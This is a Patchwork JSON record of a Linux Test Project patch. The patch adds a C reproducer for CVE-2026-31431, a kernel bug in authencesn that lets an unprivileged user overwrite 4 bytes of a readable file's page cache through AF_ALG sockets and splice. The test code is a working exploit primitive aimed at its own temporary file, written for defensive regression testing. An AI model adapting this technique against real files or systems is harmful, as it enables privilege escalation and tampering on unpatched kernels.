{"id":2231064,"url":"http://patchwork.ozlabs.org/api/1.1/patches/2231064/?format=json","web_url":"http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com/","project":{"id":59,"url":"http://patchwork.ozlabs.org/api/1.1/projects/59/?format=json","name":"Linux Test Project development","link_name":"ltp","list_id":"ltp.lists.linux.it","list_email":"ltp@lists.linux.it","web_url":"","scm_url":"","webscm_url":""},"msgid":"<20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com>","date":"2026-04-30T10:17:14","name":"cve-2026-31431: Add page cache corruption reproducer","commit_ref":null,"pull_url":null,"state":"needs-review-ack","archived":false,"hash":"ba1d3a388b62819672a8acd9a7f660446bd8476a","submitter":{"id":83220,"url":"http://patchwork.ozlabs.org/api/1.1/people/83220/?format=json","name":"Andrea Cervesato","email":"andrea.cervesato@suse.de"},"delegate":null,"mbox":"http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com/mbox/","series":[{"id":502266,"url":"http://patchwork.ozlabs.org/api/1.1/series/502266/?format=json","web_url":"http://patchwork.ozlabs.org/project/ltp/list/?series=502266","date":"2026-04-30T10:17:14","name":"cve-2026-31431: Add page cache corruption reproducer","version":1,"mbox":"http://patchwork.ozlabs.org/series/502266/mbox/"}],"comments":"http://patchwork.ozlabs.org/api/patches/2231064/comments/","check":"success","checks":"http://patchwork.ozlabs.org/api/patches/2231064/checks/","tags":{},"headers":{"Return-Path":"","X-Original-To":["incoming@patchwork.ozlabs.org","ltp@lists.linux.it"],"Delivered-To":["patchwork-incoming@legolas.ozlabs.org","ltp@picard.linux.it"],"Authentication-Results":["legolas.ozlabs.org;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key;\n unprotected) header.d=suse.de header.i=@suse.de header.a=rsa-sha256\n header.s=susede2_rsa header.b=XFfjuZ2w;\n\tdkim=fail reason=\"signature verification failed\" header.d=suse.de\n header.i=@suse.de header.a=ed25519-sha256 header.s=susede2_ed25519\n header.b=6NraV8Sb;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key)\n header.d=suse.de header.i=@suse.de header.a=rsa-sha256 header.s=susede2_rsa\n header.b=XFfjuZ2w;\n\tdkim=neutral header.d=suse.de header.i=@suse.de header.a=ed25519-sha256\n header.s=susede2_ed25519 header.b=6NraV8Sb;\n\tdkim-atps=neutral","legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=2001:1418:10:5::2; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)","smtp-out1.suse.de;\n\tnone"],"Received":["from picard.linux.it (picard.linux.it [IPv6:2001:1418:10:5::2])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519 server-signature ECDSA (secp384r1) server-digest SHA384)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5qqF4y7hz1yHZ\n\tfor ; Thu, 30 Apr 2026 20:17:29 +1000 (AEST)","from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id AE6EB3E68C7\n\tfor ; Thu, 30 Apr 2026 12:17:21 +0200 (CEST)","from in-2.smtp.seeweb.it (in-2.smtp.seeweb.it\n [IPv6:2001:4b78:1:20::2])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id CD92E3E1A52\n for ; Thu, 30 Apr 2026 12:17:17 +0200 (CEST)","from smtp-out1.suse.de (smtp-out1.suse.de [195.135.223.130])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-2.smtp.seeweb.it (Postfix) with ESMTPS id 4E11A60026D\n for ; Thu, 30 Apr 2026 12:17:17 +0200 (CEST)","from imap1.dmz-prg2.suse.org (unknown [10.150.64.97])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by smtp-out1.suse.de (Postfix) with ESMTPS id AF8426A803;\n Thu, 30 Apr 2026 10:17:16 +0000 (UTC)","from imap1.dmz-prg2.suse.org (localhost [127.0.0.1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by imap1.dmz-prg2.suse.org (Postfix) with ESMTPS id 90146593B0;\n Thu, 30 Apr 2026 10:17:16 +0000 (UTC)","from dovecot-director2.suse.de ([2a07:de40:b281:106:10:150:64:167])\n by imap1.dmz-prg2.suse.org with ESMTPSA id R/noICws82kScwAAD6G6ig\n (envelope-from ); Thu, 30 Apr 2026 10:17:16 +0000"],"DKIM-Signature":["v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=XFfjuZ2w5zy+tFyTsejlrUrc3qk2SQ+Kwk9m8VorkBusiOdcu1+7xbBgEkU+fDYi0gYVyS\n b+HzD0r7r7TIzGd4oUL8Kt2i0cd9at2a8rUm4T2HPGvnmkhO7DxyacTvFP0gz5mq7zo7fZ\n hb09y55pOHIkxe//spUe/dkx2buoyGk=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=6NraV8SbObpTkPUmPDXxt3D1dWfOeMy03LHG1WYEMhtdzuFmZO6GHrFrtJgWZOEanVosvx\n JIEDnSt+CCTIJnAA==","v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=XFfjuZ2w5zy+tFyTsejlrUrc3qk2SQ+Kwk9m8VorkBusiOdcu1+7xbBgEkU+fDYi0gYVyS\n b+HzD0r7r7TIzGd4oUL8Kt2i0cd9at2a8rUm4T2HPGvnmkhO7DxyacTvFP0gz5mq7zo7fZ\n hb09y55pOHIkxe//spUe/dkx2buoyGk=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=6NraV8SbObpTkPUmPDXxt3D1dWfOeMy03LHG1WYEMhtdzuFmZO6GHrFrtJgWZOEanVosvx\n JIEDnSt+CCTIJnAA=="],"From":"Andrea Cervesato ","Date":"Thu, 30 Apr 2026 12:17:14 +0200","MIME-Version":"1.0","Message-Id":"<20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com>","X-B4-Tracking":"v=1; b=H4sIACks82kC/6tWKk4tykwtVrJSqFYqSi3LLM7MzwNyDHUUlJIzE\n vPSU3UzU4B8JSMDIzMDE2MD3eSyVF0QR9fY0MTYUDc1JdHEyNI8xdQsKVkJqKmgKDUtswJsYHR\n sbS0ADCTSfWAAAAA=","X-Change-ID":"20260430-cve-2026-31431-eda4297d56bc","To":"Linux Test Project ","X-Mailer":"b4 0.14.2","X-Developer-Signature":"v=1; a=ed25519-sha256; t=1777544236; l=6897;\n i=andrea.cervesato@suse.com; s=20251210; h=from:subject:message-id;\n bh=S/GBJgJZ9Pq34TF9mz2UvgScf8nbYIq4dh8uuMTIRhw=;\n b=7qEhFK8TrQHNuxG+7jMkMSF67WCAmvb9MstKAg6s70Y8VrXtZNIqIv8F4tjwm05BG2DNBtOGK\n 1/jF6xiWahzC65IKvzTPzrynfIZ8UL38HFSbuYiYf72R8/e23vrGEs4","X-Developer-Key":"i=andrea.cervesato@suse.com; a=ed25519;\n pk=zKY+6GCauOiuHNZ//d8PQ/UL4jFCTKbXrzXAOQSLevI=","X-Spamd-Result":"default: False [-4.30 / 50.00]; BAYES_HAM(-3.00)[100.00%];\n NEURAL_HAM_LONG(-1.00)[-1.000];\n NEURAL_HAM_SHORT(-0.20)[-1.000]; MIME_GOOD(-0.10)[text/plain];\n RCVD_TLS_ALL(0.00)[]; RCPT_COUNT_TWO(0.00)[2];\n FUZZY_RATELIMITED(0.00)[rspamd.com];\n RCVD_VIA_SMTP_AUTH(0.00)[]; ARC_NA(0.00)[];\n DKIM_SIGNED(0.00)[suse.de:s=susede2_rsa,suse.de:s=susede2_ed25519];\n URIBL_BLOCKED(0.00)[suse.com:mid,suse.com:email,imap1.dmz-prg2.suse.org:helo];\n TO_DN_ALL(0.00)[]; FROM_HAS_DN(0.00)[]; MIME_TRACE(0.00)[0:+];\n FROM_EQ_ENVFROM(0.00)[]; TO_MATCH_ENVRCPT_ALL(0.00)[];\n RCVD_COUNT_TWO(0.00)[2];\n DBL_BLOCKED_OPENRESOLVER(0.00)[imap1.dmz-prg2.suse.org:helo, suse.com:mid,\n suse.com:email]","X-Spam-Score":"-4.30","X-Spam-Level":"","X-Spam-Status":"No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,DMARC_PASS,SPF_HELO_NONE,SPF_PASS\n shortcircuit=no autolearn=disabled version=4.0.1","X-Spam-Checker-Version":"SpamAssassin 4.0.1 (2024-03-25) on in-2.smtp.seeweb.it","X-Virus-Scanned":"clamav-milter 1.0.9 at in-2.smtp.seeweb.it","X-Virus-Status":"Clean","Subject":"[LTP] [PATCH] cve-2026-31431: Add page cache corruption reproducer","X-BeenThere":"ltp@lists.linux.it","X-Mailman-Version":"2.1.29","Precedence":"list","List-Id":"Linux Test Project ","List-Unsubscribe":",\n ","List-Archive":"","List-Post":"","List-Help":"","List-Subscribe":",\n ","Content-Type":"text/plain; charset=\"us-ascii\"","Content-Transfer-Encoding":"7bit","Errors-To":"ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it","Sender":"\"ltp\" "},"content":"From: Andrea Cervesato \n\nA logic bug in authencesn allows an unprivileged user to corrupt\n4 bytes of page cache via AF_ALG + splice. The test writes known\ndata to a file, attempts corruption through the AEAD scratch-write\npath, and verifies whether the file content was modified.\n\nSigned-off-by: Andrea Cervesato \n---\n runtest/cve | 1 +\n testcases/cve/.gitignore | 1 +\n testcases/cve/cve-2026-31431.c | 172 +++++++++++++++++++++++++++++++++++++++++\n 3 files changed, 174 insertions(+)\n\n\n---\nbase-commit: 69b8169310425b8c5abd01d3fdb46f6d939e8a66\nchange-id: 20260430-cve-2026-31431-eda4297d56bc\n\nBest regards,","diff":"diff --git a/runtest/cve b/runtest/cve\nindex c3ecd74dd9f837924b810b7b431ebb911d809966..499cbb3bc4170453560c329133e2c52b5a3b8c5c 100644\n--- a/runtest/cve\n+++ b/runtest/cve\n@@ -93,3 +93,4 @@ cve-2022-0185 fsconfig03\n cve-2022-4378 cve-2022-4378\n cve-2025-38236 cve-2025-38236\n cve-2025-21756 cve-2025-21756\n+cve-2026-31431 cve-2026-31431\ndiff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore\nindex dc1dad5b0d0d02a3ab57e72516c33ee7949c8431..f8e2b7a7d0a6c0c32f8908ae9974ead6a57f358b 100644\n--- a/testcases/cve/.gitignore\n+++ b/testcases/cve/.gitignore\n@@ -15,3 +15,4 @@ icmp_rate_limit01\n tcindex01\n cve-2025-38236\n cve-2025-21756\n+cve-2026-31431\ndiff --git a/testcases/cve/cve-2026-31431.c b/testcases/cve/cve-2026-31431.c\nnew file mode 100644\nindex 0000000000000000000000000000000000000000..b762096c1ecb940267ab2a337130939763f75452\n--- /dev/null\n+++ b/testcases/cve/cve-2026-31431.c\n@@ -0,0 +1,172 @@\n+// SPDX-License-Identifier: GPL-2.0-or-later\n+/*\n+ * Copyright (C) 2026 SUSE LLC Andrea Cervesato \n+ */\n+\n+/*\\\n+ * Test for CVE-2026-31431 (\"Copy Fail\") fixed in kernel v7.0:\n+ * a664bf3d603d (\"crypto: algif_aead - Separate src from dst\")\n+ *\n+ * A logic bug in authencesn, the kernel's AEAD wrapper for IPsec Extended\n+ * Sequence Numbers, allows an unprivileged user to write 4 controlled bytes\n+ * into the page cache of any readable file. During AEAD decryption,\n+ * authencesn uses the destination scatterlist as scratch space for ESN byte\n+ * rearrangement. When data is spliced from a file into an AF_ALG socket, the\n+ * 2017 in-place optimization (72548b093ee3) places page cache pages into the\n+ * writable destination scatterlist. authencesn's scratch write then corrupts\n+ * those pages.\n+ *\n+ * The test creates a file with known data, attempts page cache corruption via\n+ * the AF_ALG + splice technique, and verifies whether the file content was\n+ * modified.\n+ *\n+ * Reproducer based on:\n+ * https://github.com/theori-io/copy-fail-CVE-2026-31431\n+ */\n+\n+#include \"tst_test.h\"\n+#include \"tst_af_alg.h\"\n+#include \"lapi/socket.h\"\n+#include \"lapi/splice.h\"\n+\n+#define TESTFILE \"copy_fail\"\n+#define OVERWRITE_SIZE 4\n+#define AEAD_AUTHSIZE 4\n+#define AEAD_ASSOCLEN 8\n+#define AES_IV_SIZE 16\n+#define SPI_SIZE 4\n+\n+static const uint8_t original[OVERWRITE_SIZE] = { 'X', 'X', 'X', 'X' };\n+static const uint8_t payload[OVERWRITE_SIZE] = { 'P', 'W', 'N', 'D' };\n+\n+/*\n+ * authenc key format: struct rtattr header (8 bytes) +\n+ * HMAC-SHA256 key (16 bytes) + AES-128 key (16 bytes)\n+ */\n+static const uint8_t authenc_key[] = {\n+\t0x08, 0x00, 0x01, 0x00,\n+\t0x00, 0x00, 0x00, 0x10,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+};\n+\n+static void try_corrupt(int fd)\n+{\n+\tint algfd, reqfd, pipefd[2];\n+\tloff_t off_in = 0;\n+\tuint8_t aad[AEAD_ASSOCLEN];\n+\tuint8_t iv[AES_IV_SIZE] = { 0 };\n+\tstruct af_alg_iv *alg_iv;\n+\tstruct cmsghdr *cmsg;\n+\tchar recvbuf[AEAD_ASSOCLEN];\n+\n+\t/* AAD[0..3] = SPI (don't care), AAD[4..7] = ESN scratch-write zone */\n+\tmemset(aad, 'A', SPI_SIZE);\n+\tmemcpy(aad + SPI_SIZE, payload, OVERWRITE_SIZE);\n+\n+\talgfd = tst_alg_setup(\"aead\", \"authencesn(hmac(sha256),cbc(aes))\",\n+\t\t\t authenc_key, sizeof(authenc_key));\n+\tSAFE_SETSOCKOPT(algfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL,\n+\t\t\tAEAD_AUTHSIZE);\n+\n+\treqfd = tst_alg_accept(algfd);\n+\n+\tstruct iovec iov = {\n+\t\t.iov_base = aad,\n+\t\t.iov_len = sizeof(aad),\n+\t};\n+\n+\tuint8_t cbuf[CMSG_SPACE(sizeof(uint32_t)) +\n+\t\t CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) +\n+\t\t CMSG_SPACE(sizeof(uint32_t))];\n+\n+\tmemset(cbuf, 0, sizeof(cbuf));\n+\n+\tstruct msghdr msg = {\n+\t\t.msg_iov = &iov,\n+\t\t.msg_iovlen = 1,\n+\t\t.msg_control = cbuf,\n+\t\t.msg_controllen = sizeof(cbuf),\n+\t};\n+\n+\tcmsg = CMSG_FIRSTHDR(&msg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_OP;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n+\t*(uint32_t *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT;\n+\n+\tcmsg = CMSG_NXTHDR(&msg, cmsg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_IV;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE);\n+\talg_iv = (struct af_alg_iv *)CMSG_DATA(cmsg);\n+\talg_iv->ivlen = AES_IV_SIZE;\n+\tmemcpy(alg_iv->iv, iv, AES_IV_SIZE);\n+\n+\tcmsg = CMSG_NXTHDR(&msg, cmsg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n+\t*(uint32_t *)CMSG_DATA(cmsg) = AEAD_ASSOCLEN;\n+\n+\tSAFE_SENDMSG(sizeof(aad), reqfd, &msg, MSG_MORE);\n+\n+\tSAFE_PIPE(pipefd);\n+\n+\tTEST(splice(fd, &off_in, pipefd[1], NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(file -> pipe)\");\n+\n+\tTEST(splice(pipefd[0], NULL, reqfd, NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(pipe -> AF_ALG)\");\n+\n+\t/* Expected to fail (invalid ciphertext); triggers the scratch write */\n+\tTST_EXP_FAIL_SILENT(recv(reqfd, recvbuf, sizeof(recvbuf), 0), EBADMSG);\n+\n+\tSAFE_CLOSE(pipefd[0]);\n+\tSAFE_CLOSE(pipefd[1]);\n+\tSAFE_CLOSE(reqfd);\n+\tSAFE_CLOSE(algfd);\n+}\n+\n+static void run(void)\n+{\n+\tint file_fd;\n+\tuint8_t readback[OVERWRITE_SIZE];\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\ttry_corrupt(file_fd);\n+\tSAFE_CLOSE(file_fd);\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\tSAFE_READ(1, file_fd, readback, sizeof(readback));\n+\tSAFE_CLOSE(file_fd);\n+\n+\tif (memcmp(readback, original, OVERWRITE_SIZE) != 0)\n+\t\ttst_res(TFAIL, \"Page cache was corrupted via AF_ALG splice\");\n+\telse\n+\t\ttst_res(TPASS, \"Page cache was not corrupted\");\n+}\n+\n+static void setup(void)\n+{\n+\tint fd;\n+\n+\tfd = SAFE_OPEN(TESTFILE, O_WRONLY | O_CREAT | O_TRUNC, 0644);\n+\tSAFE_WRITE(SAFE_WRITE_ALL, fd, original, OVERWRITE_SIZE);\n+\tSAFE_CLOSE(fd);\n+}\n+\n+static struct tst_test test = {\n+\t.test_all = run,\n+\t.setup = setup,\n+\t.needs_tmpdir = 1,\n+\t.tags = (const struct tst_tag[]) {\n+\t\t{\"linux-git\", \"a664bf3d603d\"},\n+\t\t{\"CVE\", \"2026-31431\"},\n+\t\t{}\n+\t},\n+};\n","prefixes":[]}